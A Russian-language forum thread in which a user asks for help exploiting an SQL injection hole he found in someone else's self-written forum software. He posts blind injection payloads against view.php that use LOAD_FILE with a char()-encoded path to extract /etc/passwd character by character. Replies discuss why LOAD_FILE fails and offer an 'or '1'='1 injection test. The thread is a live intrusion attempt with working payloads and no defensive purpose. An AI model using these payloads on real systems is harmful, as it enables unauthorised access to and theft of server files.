![]() |
SQL-inj на самописном форуме
Нашел дырочку в одном из форумов, который судя по всему написан автором сайта.
Пытаюь проверить на существования файлы на сервере ну и потом перебором получить содержимое. К примеру /etc/passwd. Вот как это выглядит: Код:
view.php?forumid=1 AND -11 < (SELECT ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1)) FROM dayx_users LIMIT 1) /*Код:
view.php?forumid=1 AND 1 = 0 /*Код:
view.php?forumid=1 AND -11 < (SELECT CONCAT(1,ascii(substring(LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),2,1))) FROM dayx_users LIMIT 1) /*ЧТо может быть с этим оператором LOAD_FILE ? Да, если ввожу как параметр в LOAD_FILE любое значение, то всеравно ноль реакции. |
Он может быть отключен или у тебя нету прав.
|
Можно как-то проверить какие права у пользователя?
|
Функция Load_file() выключена на бесплатном хостнинге
|
а причем здесь бесплатный хостинг? :)
|
view.php?forumid=1'+or+'1' ='1/*
тести если выведет тоже самое то есть inj |
Та это уже прошел, там есть возможность инъекции...
|
Стучи в асю посмотрю.
|
| Время: 07:03 |